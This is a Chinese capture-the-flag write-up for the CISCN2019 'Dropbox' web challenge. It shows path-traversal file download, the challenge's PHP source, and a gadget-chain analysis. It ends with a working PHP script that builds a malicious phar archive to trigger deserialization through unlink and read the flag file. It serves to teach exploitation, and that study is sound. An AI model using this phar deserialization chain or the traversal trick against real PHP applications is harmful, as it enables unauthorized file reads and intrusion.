[CISCN2019 华北赛区 Day1 Web1]Dropbox

反序列化[CISCN2019 华北赛区 Day1 Web1]Dropbox

1.注册登录后页面如下
[CISCN2019 华北赛区 Day1 Web1]Dropbox

2.猜测是文件上传,多测尝试以后发现后端直接讲我们的文件后缀进行了改写,无法执行脚本

3.题目提示了一个phar,应该是利用phar协议读取文件,触发反序列化读写flag文件。然而,想用phar协议读写文件需要满足这几个条件。

phar文件要能够上传到服务器端。
要有可用的魔术方法作为“跳板”。
文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤。

​ 注意: 所指的phar文件不一定需要文件后缀名必须是.phar。而是文件的结构必须满足phar文件的结构

4.需要可用的魔术方法 做跳板就必须白盒测试,看源代码写payload。题目应该是有什么隐藏的链接,或者需要目录扫描。

5.到处查看一遍后发现存在任意文件下载

[CISCN2019 华北赛区 Day1 Web1]Dropbox

6.使用filename=…/…/index.php这个文件名可以查看源码文件

7.找到源码就找高危函数和可以触发phar协议的函数

8.class.php文件中发现这两个函数

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

9.思路:unlink函数在通过phar协议解析文件的时候会触发反序列化,文件操作函数参数可控满足了,接着就需要满足有魔法方法做跳板。本来我的想法是在User类中的析构方法让 t h i s − > d b 是 F i l e 类 的 实 列 对 象 , 然 后 触 发 c l o s e 方 法 , 接 就 控 制 this->db是File类的实列对象,然后触发close方法,接就控制 this−>db是File类的实列对象,然后触发close方法,接就控制this->filename这个参数实现读取文件。但是没得回显,方法行不通。我们找一个有echo的进行回显。

    public function __destruct() {
        $this->db->close();
    }

那么只能换一条思路,从其他的魔法方法出发:我们可以让$this->db是Filelist类的实例对象,那么在调用close方法的时候由于Filelist的close方法不存在,那么就会调用Filelist的_call魔术方法,利用__call魔术方法去调用close方法。并且FIleList类中的destruct魔术方法存在echo

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

注意分析__call方法。参数 f u n c 就 是 我 们 传 递 的 c l o s e , 我 们 要 满 足 的 就 是 让 func就是我们传递的close,我们要满足的就是让 func就是我们传递的close,我们要满足的就是让file是File类对象就可以成功调用.

10 构造payload

<?php
class User
{
    public $db;
}
class File
{
    public $filename;
}
class FileList
{
    private $files;
    public function __construct()
    {
        $file = new File();
        $file->filename = "/flag.txt";
        $this->files = array($file);
    }
}
$u=new User();
$u->db=new FileList();
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($u); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

11.成功执行拿到flag(一般flag不是在当前目录就是在根目录,多测试几次就找到了)

上一篇:浅析phar反序列化漏洞攻击及实战


下一篇:phar反序列化学习